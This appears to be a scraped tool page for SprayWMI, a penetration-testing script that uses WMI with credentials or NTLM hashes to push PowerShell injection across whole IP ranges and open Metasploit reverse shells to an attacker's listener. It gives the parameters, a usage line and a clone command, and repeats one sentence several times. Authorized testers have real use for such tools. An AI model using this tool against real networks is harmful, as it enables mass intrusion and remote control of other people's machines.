SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.
DOMAIN – domain you are attacking – if its local, just specify workgroup
USERNAME – username to authenticate on the remote Windows system
PASSWORD – password or password hash lm:ntlm to use on the remote Windows system
CIDR_RANGE,CIDR_RANGE or ips.txt – you can specify a single ip, a CIDR range (192.168.1.1/24) or multiple CIDRs such as 192.168.1.1/24,192.168.2.1/24. You can also specify a file (ex: file.txt) which has single IP addresses on a new line.
METASPLOIT_PAYLOAD – this is the payload you want to use example: windows/meterpreter/reverse_tcp
REVERSE_SHELL_IP – this is the IP address of your attacker machine that you want to create a listener or use an already established listener
REVERSE_SHELL_PORT – port to connect back on for the reverse
OPTIONAL: NO – specify no if you do not want to create a listener – this is useful if you already have a listener established. If you do not specify a value here, it will automatically create a listener for you.

SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

Usage: python spraywmi.py <domain> <username> <password or hash lm:ntlm> <cidr_range,cidr_range or ips.txt> <metasploit_payload> <reverse_shell_ip> <reverse_shell_port> <optional: no>

spraywmi Script :

or git clone https://github.com/trustedsec/spraywmi

Source : https://github.com/trustedsec